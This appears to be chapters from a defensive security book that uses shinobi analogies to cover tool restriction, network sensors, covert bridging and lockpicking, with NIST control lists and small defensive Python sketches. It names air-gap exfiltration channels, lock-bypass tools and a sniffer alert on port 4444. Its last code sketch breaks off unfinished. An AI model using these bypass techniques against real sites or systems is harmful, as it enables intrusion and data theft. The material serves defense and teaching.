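As referenced in step 1, a software inventory can begin with a simple script. The sketch below walks a directory tree, hashes candidate executables, and writes a baseline CSV that later audits—and the whitelist in step 3—can be diffed against. The scanned path, file extensions, and output filename are illustrative assumptions:

    import csv
    import hashlib
    import os

    def hash_file(path):
        digest = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                digest.update(chunk)
        return digest.hexdigest()

    def build_baseline(root, out_csv):
        with open(out_csv, "w", newline="") as out:
            writer = csv.writer(out)
            writer.writerow(["path", "sha256"])
            for dirpath, _, filenames in os.walk(root):
                for name in filenames:
                    if name.lower().endswith((".exe", ".dll", ".ps1")):
                        full = os.path.join(dirpath, name)
                        try:
                            writer.writerow([full, hash_file(full)])
                        except OSError:
                            pass  # unreadable file; log it in a real audit

    if __name__ == "__main__":
        build_baseline(r"C:\Windows\System32", "tool_baseline.csv")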


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with valuable assets inside. Your estate produces rare, proprietary threads that are necessary for onsite textile construction and repair. They are also sold for considerable sums—income that keeps your domain profitable. You receive credible threat intelligence that a shinobi plans to infiltrate your castle and poison the spindle needle on a spinning wheel, but it is unclear whom they are targeting and what their objective is.

Model threat scenarios in which someone could be pricked by a spindle needle. Then develop mitigations to lower the probability and impact of the prick. For example, you might dull the needles or make people wear protective gloves in the spinning room. Could you reposition the spinning wheel to make it harder for workers to accidentally bump or graze the needle? What access controls could you place on transporting spindle needles within the castle, and what supply chain protections could you implement on new needles coming in? How many ways can you come up with to prevent the poisoned needle from being used for malicious purposes? What other sharp tools might workers substitute for needles, and should you remove access to them? Could you even redesign the spindle wheel to operate without a needle?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of tools in mind.

1. Evaluate your technical capability to enforce the “principle of

least functionality” by disabling, deleting, and restricting access

to unnecessary software and system functions in your environ-

ment. [CM-7: Least Functionality]

2. Conduct periodic reviews of the functions, tools, and software

used for each role and system to determine whether they are nec-

essary or whether they could be removed or disabled. Establish

a system to register, track, and manage these tools. [CM-7: Least

Functionality | (1) Periodic Review | (3) Registration Compliance]

3. After documenting every tool that a user or system could lever-

age, restrict users from putting those tools to use for functions


outside the user’s role in the organization. [CM-7: Least

Functionality | (2) Prevent Program Execution]

4. Implement a whitelist or blacklist (or both) of software, appli-

cations, and other tools. [CM-7: Least Functionality | (4)

Unauthorized Software/Blacklisting | (5) Authorized

Software/Whitelisting]

5. Implement physical and network boundary restrictions on hard-

ware and software tools. For example, restrict sensitive tools to

a segregated management-net file server or in portable locked

media devices, to be accessed only when needed and in combina-

tion with JEA/JIT access controls. [MA-3: Maintenance Tools

| (1) Inspect Tools | (3) Prevent Unauthorized Removal | (4)

Restricted Tool Use; SC-7: Boundary Protection | (13) Isolation of

Security Tools/Mechanisms/Support Components]

6. Evaluate all installed software to determine which imports, APIs,

functional calls, and hooks are used by applications known to be

safe. Consider using malcode protections to block any tools that

use these implementations or others that normal software does

not use. Consider your options to restrict, disable, and remove OS

functions, modules, components, and libraries that are not used

for business operations. [SA-15: Development Process, Standards,

and Tools | (5) Attack Surface; SI-3:Malicious Code Protection |

(10) Malicious Code Analysis]

Debrief

In this chapter, you learned about tools—how powerful they are and why

it’s important to keep them safe. You learned about “living off the land”

and the complexity of making systems both defensible and functional.

You may have also started to ponder the distinctions between tools and

malware, as well as how one might program a tool to identify the differ-

ences between the two. The thought exercise of the poisoned spindle

challenged you to outwit


the enemy who’s invading an environment you

control.

In the following chapter, we will discuss different techniques used by

shinobi scouts—smelling, seeing, and hearing—and what we can learn

from them, particularly as we apply different types of digital sensors in

our cyber environment.

9

S E N S O R S

Whether day or night, scouts for a far-distance

observation should be sent out.

Even if a shinobi does not have impressive physical abilities,

remember that the most vital thing is to have acute observation.

—Yoshimori Hyakushu #11

In addition to stationing guards at gates and soldiers at

watch posts, Bansenshūkai recommends defending a castle

by placing scouts surreptitiously along roads, paths, and

other approaches. The defending commander should

place scouts at staggered intervals around the castle’s

perimeter.1 These scouts fulfilled one of three roles:

• Smelling scouts (kagi)

• Listening scouts (monogiki)

• Outside foot scouts (togiki)

Smelling and listening scouts, who used trained dogs and dog handlers,

placed themselves in shrouded observation posts—they couldn’t see out, but

neither could the enemy see in. The scout focused intently on smelling or

listening for signs of infiltration. These techniques worked especially well at

night, as smelling and listening scouts did not need light to operate.2


Outside foot scouts tried to catch infiltrators by conducting sweeps

at the edge of enemy territory; hiding on enemy ground and monitor-

ing movement toward their own camp; or using tripwires, noise, or

even physical contact to detect intruders. Bansenshūkai says that togiki

scouts should be shinobi themselves, as they must be skilled in stealth

and observation, have a preternatural understanding of which direc-

tion the enemy will attack from, and be able to successfully detect and
engage an enemy ninja.3

In addition to human (and animal) scouts, Bansenshūkai recom-

mends using active and passive detection techniques to identify enemy

infiltrators. Actively, shinobi might lower or swing a sarubi (monkey-fire,

or “fire on a rope”4) into or across a dark area such as a moat, trench,

or the bottom of a castle wall to quickly and dynamically illuminate it,

from a distance, in a way that fixed lanterns couldn’t. Passively, shinobi

would build detection systems, for instance, by filling a wide but shal-

low trench with fine sand, then raking the sand into a complex pattern.

Should an enemy bypass exterior defenses, they would leave footprints,

alerting guards that the castle had been breached. Footprints in the

sand might also tell an observant shinobi which direction the enemy

came from and whether they had left the same way—valuable intel-

ligence that could help neutralize an immediate threat and shore up

future defenses.5

In this chapter, we will look at the different types of security sensors

commonly used in networks, comparing and contrasting modern deploy-

ment with the ways shinobi historically used sensors. We will highlight

sensor placement, as well as sensor countermeasure techniques, learning

from the shinobi to enhance our own cybersecurity defenses. We will also

propose sensors based on the sensory scouts of ancient times.

Identifying and Detecting Threats with Sensors

In cyber parlance, the term sensor encompasses a variety of detection sys-

tems and instruments. Most commonly, a sensor is a monitoring device

on a tap, T-split, span, or mirror port that copies activity for observation,

recording, and analysis. In one such configuration, sensors sniff and cap-

ture raw packets (PCAPs) as they cross the wire, then process and analyze

them to alert security to suspicious events. Sensors can also be placed “in

line,” meaning a packet travels through a device that can delay, block, or

alter the packet’s information, effectively thwarting attacks rather than

simply raising a red flag. Secondary sensors, such as Wi-Fi sensors, detect

external or other unauthorized signals and connections, while physical

security sensors, such as cameras, monitor access to sensitive data centers,


server racks, and switch closets. In broader terms, certain software end-

point agents also act as sensors, as they collect events, actions, and activity

on a host system and report back to a command and control (C2) system

to analyze and raise alerts if necessary.
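
As a minimal sketch of such a sensor—assuming the third-party scapy package, a capture-capable interface on a tap or mirror port, and port 4444 as a placeholder indicator—the following sniffs traffic and raises a local alert on a simple condition:

    from scapy.all import IP, TCP, sniff  # third-party: pip install scapy

    SUSPECT_PORT = 4444  # placeholder indicator; tune to your environment

    def inspect(packet):
        if packet.haslayer(IP) and packet.haslayer(TCP):
            if packet[TCP].dport == SUSPECT_PORT:
                print(f"ALERT: {packet[IP].src} -> {packet[IP].dst}:{SUSPECT_PORT}")

    if __name__ == "__main__":
        # store=False keeps memory use flat on a busy wire
        sniff(filter="tcp", prn=inspect, store=False)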

Organizations often dedicate sensors to certain types of traffic—

for example, by configuring email gateway security devices for phishing

attempts or spam, intrusion prevention/detection systems for network

attacks, firewalls for unauthorized IPs and ports, proxies for suspicious

websites, and data loss prevention systems. Sensor-based cybersecurity

devices are typically installed at the main egress point of a network,
usually in the demilitarized zone (DMZ). Because it is standard to place

sensors as far up the network as possible to maximize the amount of

traffic they see, if adversaries hide from sensors at the gateway or bypass

the main egress to bridge into a network, it’s possible for them to oper-

ate within the network free from security sensor inspection.

Despite this security liability, most organizations are unlikely to dras-

tically increase the number of sensors in their systems, as purchasing

many additional sensors—along with the extra work to license, install,

update, maintain, and monitor them all—is financially impractical.

Unfortunately, many organizations simply assume that if the main egress

sensor does not catch a threat, then more of the same sensor would not

be more effective. This is an error in judgment that puts their systems

at risk.

Better Sensors

A major problem with sensors is that they almost always require a person

to monitor them and act on the information they convey. This problem

is compounded by the limitations of security sensors and available analy-

sis platforms. Think of modern security sensors this way: a building has

a number of tiny microphones and cameras scattered throughout, but

these cameras and microphones are trapped inside little straws—straws

that give them narrow fields of capture. Now imagine trying to piece

together an active breach while only able to peer through a single straw

at a time. Not only that, but each straw is building up thousands of hours

of data to store, process, and analyze. This frustrating situation is often

alleviated with signatures, algorithms, or machine learning—tools that

can help to identify anomalies and malicious activity. However, these

automated systems aren’t perfect. Often, they create false positives or cre-

ate such a large flood of legitimate alerts that it can feel the same as not

having sensors at all. To remedy these problems, we can take a page from

the shinobi: we can identify the paths an enemy is likely to take, and we


can hide many types of sensors along those paths to give early warning of

attacks. Consider the following guidance as you consider improving the

sensors in your organization:

1. Model your network and identify your weaknesses. Create a network

map and information flow model of your environment—one that

describes every system and its purpose, how systems are connected,

where information enters and leaves your network, the type of

information received, what sensors (if any) inspect information,

and the egress points. Identify areas that lack sensors and places

you believe are properly monitored. Predict where threat actors

will attempt to infiltrate your network. Keep in mind that creating

a comprehensive map can take months and requires help across

the entire enterprise. Your resulting map might not be perfect, but

even a flawed map is better than no map at all.

2. Conduct red team and pen testing. Contract a red team to attempt

infiltration of your network. Consider a “purple team” approach

to the exercise, in which your network defenders (the blue team)

observe the red


team in real time in the same room and can

pause the exercise to ask questions. Query the security sensors

before, during, and after the attack to see what they detected or

reported, if anything. This information should be highly enlight-

ening. Allow your blue team to consider how different sensor

placement could have detected the red team faster and more

accurately. Discuss architectural defense changes, sensor tuning,

and other solutions that are suggested by the testing.

3. Detect and block encrypted traffic. Block all encrypted traffic that

cannot be intercepted and inspected by your sensors. Also, take

appropriate steps to strip your machines’ ability to use unauthor-

ized encryption. Have the red team test your ability to detect

encrypted traffic attacks. Most sensors cannot inspect encrypted

traffic; therefore, many organizations allow asymmetric encryp-

tion, such as elliptic-curve Diffie-Hellman (ECDH), which cannot

be broken by root certificates. Allowing unbroken encrypted traf-

fic to leave your organization without going through DLP creates

a security gap analogous to when castle guards scrutinize every

bare-faced person who enters or leaves through the gate but per-

mit anyone wearing a mask to walk through unchallenged.

4. Develop “smelling” and “listening” sensors. Explore opportunities

to create sensors that can secretly detect certain types of threat

activity. For example, configure an external physical sensor that

monitors a system’s CPU activity or power consumption and can


detect unauthorized access or use—such as by a cryptocurrency

miner—based on whether performance correlates with known

commands or logged-in user activity.

5. Implement passive sensors. Establish passive interfaces on switches

and servers that should never be used. Also, configure sensors to

detect and alert locally if an interface is activated, indicating the

likely presence of an adversary on your network. Much like a shal-

low trench filled with sand, such systems can be built to detect

lateral movement between network devices where it should not

happen. (A minimal canary sketch of this idea follows the list.)

6. Install togiki sensors. Place inward-facing sensors outside your

network to detect infiltration. For example, with the cooperation

of your ISP, configure sensors outside your network boundary to

monitor inbound and outbound traffic that your other sensors

might not detect. Place sensors in a T-split directly off a device

working in conjunction with a host-based sensor, and then diff

the devices against each other to determine whether both sensors

are reporting the same activity. This approach helps identify com-

promised endpoint sensors and network interface drivers.
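
Here is the canary sketch promised in item 5. It listens on a port that no legitimate user or service should ever touch (2222 is a placeholder) and treats any connection at all as a likely sign of lateral movement—a digital version of the raked sand trench:

    import datetime
    import socket

    CANARY_PORT = 2222  # hypothetical port no legitimate service uses

    def run_canary():
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("0.0.0.0", CANARY_PORT))
        server.listen(5)
        while True:
            conn, addr = server.accept()
            # Any connection at all is an alert-worthy event
            print(f"{datetime.datetime.now()} ALERT: canary touched by {addr[0]}")
            conn.close()

    if __name__ == "__main__":
        run_canary()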

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with valuable assets inside. You have had three arson events inside your castle in the past week, though a fire watch was on standby and doused the flames before they spread. You believe the arsonist is a shinobi who has learned from your team's responses and will perform a new attack—one that may not even involve fire. Your resources are thin, but your fire watch asks for additional staff and equipment to better respond, your architect wants to reinforce and fireproof sections of the castle, and your head of security requests more guards on the gates to catch the infiltrator.

How would you hide sensors to detect the arsonist or other suspicious

actors inside your castle? Could you improve fire watch response time and

capability while reducing the number of fire watch members, perhaps by

using them as sensors rather than as responders? Where and how might you

place human sensors to most effectively detect and alert others to suspicious

activity? How would you rotate perimeter guards between sweeping inside

and outside the castle, and how would you augment their capabilities to pre-

vent an adversary from identifying when or where the guards are patrolling?

What passive sensors could you implement to catch the arsonist?


Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of sensors in mind.

1. Implement packet sniffers, full network PCAPs, and other

automated sensors to support incident handling, maintenance,

and information flow enforcement. [AC-4: Information Flow

Enforcement | (14) Security Policy Filter Constraints; IR-4:

Incident Handling; MA-3: Maintenance Tools]

2. To safeguard physical access and detect tampering, install sen-

sors on wiring closet locks, cameras to monitor data center and

server access, water sensors to detect leaks that can threaten

electrical devices, and wiretapping sensors on communication

lines. [PE-4: Access Control for Transmission; PE-6: Monitoring

Physical Access; PE-15: Water Damage Protection]

3. Run awareness training programs for staff—including non-IT

staff—so they can act as human sensors to detect threat activ-

ity. Provide a clear, easy, and accessible method for employees to

report suspicious activity. [PM-16: Threat Awareness Program]

4. Intercept encrypted communications and allow your sensors

to perform deep inspections of unencrypted packets. [AC-4:

Information Flow Enforcement | (4) Content Check Encrypted

Information; SC-8: Transmission Confidentiality and Integrity]

5. Implement sensors that can analyze packets and take preventive

measures such as blocking or filtering. [SC-5: Denial of Service

Protection; SC-7: Boundary Protection | (10) Prevent Exfiltration

| (17) Automated Enforcement of Protocol Formats]

6. Prohibit promiscuous sensor activation on non-sensing systems

to prevent the release of sensitive information to adversaries who

gain unauthorized access. [SC-42: Sensor Capability and Data]

7. Work with your ISP to place Trusted Internet Connection (TIC)

sensors outside your network boundary. [AC-17: Remote Access |

(3) Managed Access Control Points]

8. Document all internal system connections; their interfaces; the

information they process, store, and communicate; and sensor

placement between systems. [CA-9: Internal System Connections]

9. Conduct penetration testing and red team exercises to test and

validate your sensor placement and capability. [CA-8: Penetration

Testing; RA-6: Technical Surveillance Countermeasures Survey]


Debrief

In this chapter, we talked about smelling, hearing, and outside sensory

scouts used to detect enemy shinobi in ancient Japan. We also looked at

active and passive sensors that castle guards deployed to catch intruders.

We then discussed various types of security sensors used today—sensors

that help defenders see what’s happening on the wires around them. We

covered several logistical problems around sensors such as sensor place-

ment, false positives, and sensor management. Lastly, we talked about

how to apply ancient shinobi techniques to identify intruders in net-

worked systems.

Next, we will discuss the different types of bridges and ladders shi-

nobi used to bypass castle defenses—a concept that has some importance

in regard to sensors. For instance, imagine your castle is protected by

a moat and you have placed all of your sensors at the drawbridge. An

enemy shinobi who is able to covertly place a bridge of their own without

using the drawbridge also effectively bypasses your sensors—making

them useless. We’ll explore how this bridging concept is almost exactly

the same in cybersecurity and how difficult it can be to address.

10

B R I D G E S A N D L A D D E R S

There will be no wall or moat that you cannot pass, no matter

how high or steep it is, particularly if you use a ninja ladder.

A castle gatehouse is usually most strictly guarded, but the roof

is the most convenient place for you to attach a hooked ladder.

—Bansenshūkai, “In-nin II” 1

The shinobi could


move, quietly and unseen, over an

enemy’s walls and gates, using ninki infiltration tools—

tools described in both Bansenshūkai 2 and Gunpo Jiyoshu.3

Multifaceted ladders and portable bridges like the spiked

ladder, cloud ladder, or tool transportation wire4 enabled

shinobi to cross moats, scale walls, and deliver tools to

other shinobi safely and stealthily. Sometimes these lad-

ders were “proper,” or made by shinobi in advance of a

mission, and sometimes they were “temporary,” or con-

structed in the field.5 These were valuable tools, as they

provided access to sensitive locations often left unguarded

out of overconfidence that they were inaccessible.


The scrolls also explain how to infiltrate an enemy camp by manipu-

lating the enemy’s own security measures. Shōninki instructs shinobi to

imagine how a bird or fish might access a castle6—in other words, to real-

ize the unique advantages that being up high or down low provide. For

example, scaling a wall affords the opportunity to bridge across other

walls and rooftops with great speed, providing better access to the inte-

rior of the castle than passing through a gate might. Swimming across

a moat could provide underwater access to a common waterway—one

that leads into a castle. The Bansenshūkai even recommends purposefully

attempting to bridge over the guardhouse gate, where the most guards

would logically be stationed, because the defenders might assume that

attackers would avoid trying to penetrate at this point.7

In this chapter, we will discuss how bridging network domains is

similar to bridging castle wall perimeters. Just like castle walls, networks

are engineered with barriers and segmentations that assume one must

pass through a controlled gateway. Bridges allow threats to bypass these

gateways, circumventing the security controls established at gateway egress

points. What may seem like a straightforward measure to take, like instruct-

ing guards to confront anyone building a bridge across the castle moat,

can become futile when, say, the castle architect opted to connect the

moat’s concentric rings for water management reasons. Connected, three

moats are no longer three discrete boundaries that an adversary must

pass. Instead, they’re a bridge of water to be swum straight into the heart

of the castle. Learning how to think like a shinobi and seeing barriers as

potential ladder-hooking points can help you reassess your own network

and preemptively cut off bridging opportunities.

Network Boundary Bridging

To cybersecurity professionals, a bridge is a virtual or physical network

device that operates at both the physical and data link layers—layers 1 and

2 of the OSI model—to connect two segments of a network so they form

a single aggregate network. The term also refers to any device, tool, or

method that enables information to cross a “gap,” such as an air-gapped

network or segmentation boundary. Bridges typically bypass security

controls and safeguards, allowing for data exfiltration from the network

or the delivery of unauthorized or malicious data to the network. These

potentially dire consequences have pushed cybersecurity professionals to

develop detection and mitigation methods to prevent bridging, including:

• Disabling network bridging on wireless Ethernet cards

• Disabling systems with two or more active network interfaces


• Implementing network access controls (NACs) and monitoring to

detect new devices on a network (a minimal scan sketch follows
this list)

• Installing sensors to detect unauthorized Wi-Fi access points

• Restricting certain networks with VLANs or other router

technologies

• Using authentication in the Link Layer Discovery Protocol (LLDP)
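
The new-device scan referenced above can be as simple as an ARP sweep diffed against a known-good inventory. This sketch assumes the third-party scapy package, administrator privileges, and an illustrative subnet and MAC list:

    from scapy.all import ARP, Ether, srp  # third-party; requires admin rights

    KNOWN_MACS = {"aa:bb:cc:dd:ee:ff"}  # hypothetical device inventory

    def find_new_devices(subnet="192.168.1.0/24"):  # illustrative subnet
        # Broadcast a who-has request for every address in the subnet
        broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet)
        answered, _ = srp(broadcast, timeout=2, verbose=False)
        for _, reply in answered:
            if reply.hwsrc.lower() not in KNOWN_MACS:
                print(f"New device: {reply.psrc} ({reply.hwsrc})")

    if __name__ == "__main__":
        find_new_devices()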

Despite evolving security controls, unauthorized bridging still

happens—and some advanced infiltration techniques, while proven only

in academic or laboratory environments, demonstrate great potential for

harm. The most recent examples include taking control of system LEDs

to blink bits to an optical receiver in a different room or building, using

FM frequency signals to communicate with nearby phones (as with the

AirHopper and GSMem exploits), controlling and pulsing fans to send

bits through acoustics, and artificially overheating and cooling CPUs

to slowly send data (as with the BitWhisper exploit). Threat actors may

even be able to bridge networks through a system’s power cords via the

Ethernet over power technique (EOP, not to be confused with power over

Ethernet, POE). In other cases, an organization’s VoIP phones could have

their microphones and speakers activated remotely, allowing adversaries

to transfer sound data or spy on conversations.

Of course, some bridging is less cutting-edge. An adversary could

climb onto the roof of an office building, splice into accessible network

wires, and install a small earth satellite station that provides robust bridge

access to a network. Smartphones are routinely plugged into system USB

ports to charge their batteries, but a charging phone also connects a com-

puter to an external cellular network that is not inspected by firewalls,

data loss prevention (DLP), or other security tools, completely bypassing

an organization’s defenses and facilitating data theft or code injection on

the host network. When bridging via a sneakernet, a user loads informa-

tion onto portable media and walks it to another computer or network

location, manually bypassing security controls. There are also concerns

that threats could use the hidden management network—typically on the

10.0.0.0/8 net—that connects directly to consoles of routers, firewalls,

and other security systems, using these as jump points to bridge different

network VLANs and segments and effectively using the network to bypass

its own security. In addition, split tunneling poses a risk, as information

may be able to leak to and from different networks through a device con-

nected to both networks simultaneously.

Mature organizations work under the assumption that adversaries are

continually developing different bridging technologies to bypass defenses

in new, unforeseen ways. Indeed, it appears possible that everything


within the electromagnetic spectrum—including acoustic, light, seismic,

magnetic, thermal, and radio frequencies—can be a viable means to

bridge networks and airgaps.

Countering Bridges

Preventing bridging between systems designed to connect to other sys-

tems is a hard problem to solve. While there is no perfect solution, it is

possible to reduce bridging opportunities and focus isolation efforts on

the most important assets. In addition, countermeasures that negate the

capability of bridging techniques can be layered to improve the effective-

ness of these defenses.

1. Identify your weaknesses. Identify the networks and information sys-

tems that hold your organization’s sensitive, critical, or high-value

data. Create a data-flow diagram (DFD) to model how informa-

tion is stored and moves in the system. Then identify areas where

a covert, out-of-channel bridge attack could occur.

2. Implement bridge countermeasures. Consider implementing

TEMPEST8 controls, such as Faraday cages or shielded glass,

toblock air gap bridging through emissions or other signals. To

block rogue bridges, ensure that you have identified and authen-

ticated devices before allowing them to connect to your network

or another device. Develop appropriate safeguards to mitigate

potential bridging threats identified in your threat model.
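
One quick check that supports both steps: flag dual-homed hosts, since a machine with two or more active network interfaces is a natural bridge point between segments (or between your network and an external one). This sketch assumes the third-party psutil package and excludes only loopback interfaces:

    import psutil  # third-party: pip install psutil

    def active_interfaces():
        # Interface names vary by OS; this filter covers common loopbacks
        return [
            name
            for name, stats in psutil.net_if_stats().items()
            if stats.isup and not name.startswith(("lo", "Loopback"))
        ]

    if __name__ == "__main__":
        up = active_interfaces()
        if len(up) > 1:
            print(f"Potential bridge: multiple active interfaces {up}")
        else:
            print("Single active interface; no local bridge point found")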

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with valuable information, treasure, and people inside. You receive credible threat intelligence that a shinobi has been using special hooked ladders and cloud bridges to move people or things across your castle walls without the knowledge of your gate guards.

Consider the ways in which you could reconfigure your castle walls to detect and/or prevent ladders or bridges from bypassing them. Can you pre-

dict where the shinobi will attempt to bridge your defenses? How might you

change your guards’ inspection protocols and direct them to look for tempo-

rary bridging? How would you react to knowing that your perimeter had been

breached, and how would you adjust to working under the assumption that

your internal environment had been altered and might not be trustworthy?


Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of bridges in mind.

1. Implement boundary protections and information flow con-

trols to prevent external devices, systems, and networks from

exfiltrating data or transferring malicious code onto your network.

[AC-4: Information Flow Enforcement | (21) Physical/Logical

Separation of Information Flows; AC-19: Access Control for

Mobile Devices; AC-20: Use of External Information Systems |

(3) Non-Organizationally Owned Systems/Components/Devices;

SC-7: Boundary Protection]

2. Enforce wireless access protection controls to block or detect

unauthorized wireless signals that bridge across your networks in

microwave, UHF/VHF, Bluetooth, 802.11x, and other frequen-

cies. [AC-18: Wireless Access; SC-40: Wireless Link Protection]

3. Audit network access and interconnections to identify external

networks or systems—such as remote network printers—that

could bridge your network to transmit data. [CA-3: System
Interconnections; CA-9: Internal System Connections]

4. Establish strong portable media policies to prevent unauthorized

bridging. Require identification and authentication of external

media and devices before allowing anything to connect to your

environment. [IA-3: Device Identification and Authentication;

MP-1: Media Protection Policy and Procedures; MP-2: Media

Access; MP-5: Media Transport]

5. Test for TEMPEST leakage or other out-of-channel signals

coming from your systems. Using the results, decide where to

implement protections that inhibit a signal’s ability to be used

as a bridge. [PE-19: Information Leakage; SC-37: Out-of-Band

Channels]

Debrief

In this chapter, we talked about the philosophy of adversarial bridging,

and we discussed bridging network segments and traditional best prac-

tices. We looked at multiple bridging techniques—bridges that can cross

gaps in ways you may not have thought of before. The thought exercise


in this chapter was designed to prompt thinking about building physical

safeguards between ladders and walls; in theory, these can be founda-

tional to innovating modern defenses for the inputs/outputs of a system.

In the following chapter, we will discuss locks and the shinobi prac-

tice of lockpicking, which was based on a belief that any lock designed by

a human can be picked by a human. We also get a glimpse of a shinobi’s

approach to security when they must rely on a lock they themselves do not

trust. We will discuss the application of locks in cybersecurity, as well as

what we can learn from the shinobi to improve our approach to locks and

lockpicking.

11

L O C K S

There is no padlock that you cannot open.

However, this all depends on how skilled you are;

therefore, you should always get hands-on practice.

Opening tools are designed to help you open the doors of the

enemy house with ease. Therefore, of all the arts, this is the one

conducted when you are closest to the enemy.

—Bansenshūkai, Ninki III 1

In ancient Japan, locks were simpler than the locking

devices of today, as the manufacturing capabilities of the

time could not produce the intricate pins, tumblers, and

other components that contemporary locks use. However,

these older locks were elegantly designed, making exem-

plary use of “prongs, latches, and the natural forces of

gravity and tension” to keep people’s valuables safe from

intruders and thieves.2

Shinobi regularly encountered complex locks during their missions—

and devised ways to open all of them. The scrolls indicate that no lock,

barrier, or other mechanism was safe from a shinobi with well-constructed


tools, sufficient training and ingenuity, and an optimistic mindset.

Significant portions of all three scrolls are dedicated to documenting how

to make and use various picks, shims, and other probing tools used to

open locks, doors, and gates (Figure 11-1).3

Figure 11-1: A variety of tools used to open locks, doors, and gates. From

left to right, a probing iron, an extendable key, lockpicking shims, a pick for

guided padlocks, and a door-opening tool (Bansenshūkai and the Ninpiden).

From ring latches to rope, locking bars to hooks and pegs, sophisti-

cated key latches to rudimentary, homemade technology . . . whatever the

lock’s design, shinobi had methods and tools to bypass it. In fact, shinobi

were able to breach any security system or deterrent used at the time.4

Knowing that locks could not be fully trusted, shinobi themselves devel-

oped techniques to take security into their own hands. Some were bluntly

simple: when sleeping in lodgings secured by locks they did not trust,

shinobi sometimes tied a string from the door or window to the topknot

in their hair, ensuring they would wake up if the door latch or lock were

opened as they slept.5

Today, as in the time of shinobi, people use locks to safeguard their

property—and threat actors still use picks to defeat them. The lock, as it

always has, serves multiple purposes: it works as a deterrent. It is a visible

assurance to an owner that their property is safe. It creates a system of

accountability to the key holder(s) if the lock is breached through use of

a key. It also serves as a barrier and an alarm, since thieves will take time

and make noise as they attempt to bypass it. In this chapter, we will dis-

cuss how hackers, much like shinobi, are still picking locks and bypassing

security. Furthermore, we’ll talk about why physical locks are so impor-

tant to digital systems and detail the necessary companion precautions.


We will also explore some technological advances in locks and picks, dis-

covering what else the shinobi can teach us about security.

Physical Security

Just as lockpicking is often a gateway hobby into hacking, defeating a lock

is a common entry point into cybersecurity. The act of finding flaws in

or physically accessing a thing that is supposed to be secure—the visual,

tactile, and audible feedback of a lock’s opening in your hand after you’ve

beaten its defenses—can be a powerful sensation. It can pique interest in

the security field and build confidence in fledgling abilities.

The cybersecurity industry uses locking devices to restrict physical

access to buildings, data centers, switching closets, and individual offices.6

On a more granular level, rack locks limit access to servers, chassis-case

locks limit access to a system’s physical components, device port locks pre-

vent unauthorized use of USBs or console jacks, tethering locks prevent

systems from leaving their location, and power locks keep devices from

turning on at all. Locking down physical access to systems is a crucial

piece of an organization’s cybersecurity strategy. If systems are vulnerable

to being tampered with physically, many digital security controls are at

risk of being rendered ineffective once the adversary gains physical access.

It should be assumed that, if adversaries gain physical access to a machine,

they also gain admin-level privileges on the system and acquire its data.

Despite the proliferation of illicit lockpicking tools and techniques,

organizations tend to use the same locks year after year, leaving them-

selves extremely vulnerable to attack. Most information system and

building access locks use weak pin tumblers, such as the Yale cylindrical


lock—patented in the 1860s and now the world’s most common lock due

to its low cost and ease of mass production—and tubular locks (or “circle

locks”), the most common type of bicycle lock. Criminals construct,

sell, and use picking tools that can easily beat these off-the-shelf locks.

For example, soda can shims can pry open locks, pen caps can simu-

late tubular keys, and 3D-printed plastic keys can be easily forged from

pictures of the original. For the unskilled criminal, autoelectronic lock-

pickers can, with the pull of a trigger, do all the work of picking every
pin of a tumbler lock within seconds.

Large-scale lockpicking countermeasures are few and far between,

and some are more concerned with liability than security. For example,

certain insurance policies won’t cover break-ins and thefts if inferior

locks—such as the most common ones sold in the United States—were

picked or bypassed during the crime. Some governments issue compli-

ance standards for lock manufacturers, along with restrictions that bar


selling substandard locks to citizens. In the cybersecurity realm, select

governments safeguard their classified systems and data with a combina-

tion of cipher locks or other high-assurance locks and supplemental secu-

rity controls that mitigate the lock’s security flaws.

However, too many doors and systems still use weak lock-and-key

defenses—defenses that even a mildly sophisticated threat actor can

defeat with ease. Locks and barriers for information systems must be

improved to mitigate against common attacks such as shimming, picking,

stealing, copying, and forcing.

Improving Locks

Preventing all lockpicking is likely impossible. However, there are many pro-

active steps you can take to improve the resiliency of your locks. Improving

locks will also improve your cybersecurity posture by mitigating unauthor-

ized physical access attacks to your systems.

• Upgrade your locks. Evaluate the more advanced locking systems,

such as European dimple locks, to determine which ones are

compatible with your business requirements and budget. Seek

approval from your stakeholders and physical security team and

then upgrade all of your locks to models that are more resilient

to attack.

• Think outside the lock. Consider nontraditional locking solutions

for your organization, such as multiple-stage locks. When a first-

stage unlock mechanism controls access to a second-stage lock,

intruders cannot quickly and easily open both locks at once or in

quick succession.

For instance, to close off an entryway, use two independent

locking systems that complement each other. The first stage could

be a digital 4-digit PIN lock that would temporarily unfreeze the

pins in the second-stage lock, a cylinder lock. While the pins are

frozen in the second-stage lock, they are impossible to pick, but

a key could be inserted in preparation for activation by the first-

stage lock. Once the pins are temporarily unfrozen, the physical

key can be turned, and the entryway can be unlocked. However,

this window of opportunity opens for only three seconds. After

that, the digital lock resets and refreezes the pins. To be success-

ful, the intruder would need to first learn the PIN and then be

able to pick the door lock in under three seconds, a feat that may

not be humanly possible. (A toy model of this mechanism follows
the list.)

• Add reinforcements. Consider reinforcing the thing the lock is

securing. You might protect the hinges from tampering or install


strike plates, door/frame reinforcements, door handle shields, or

floor guards.

• Petition the lock industry. Urge the lock industry to innovate and

incorporate new designs into products used to protect infor-

mation systems. Until there is sufficient consumer pressure to

upgrade their outdated products, manufacturers will continue to

sell the same familiar, vulnerable equipment.
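
To make the two-stage lock described under "Think outside the lock" easier to reason about, here is a toy software model of its timing window. The PIN, the three-second window, and the class itself are purely illustrative:

    import time

    class TwoStageLock:
        def __init__(self, pin, window_seconds=3.0):
            self._pin = pin
            self._window = window_seconds
            self._unfrozen_at = None

        def enter_pin(self, pin):
            # Stage one: a correct PIN unfreezes the second-stage pins
            if pin == self._pin:
                self._unfrozen_at = time.monotonic()
                return True
            return False

        def turn_key(self):
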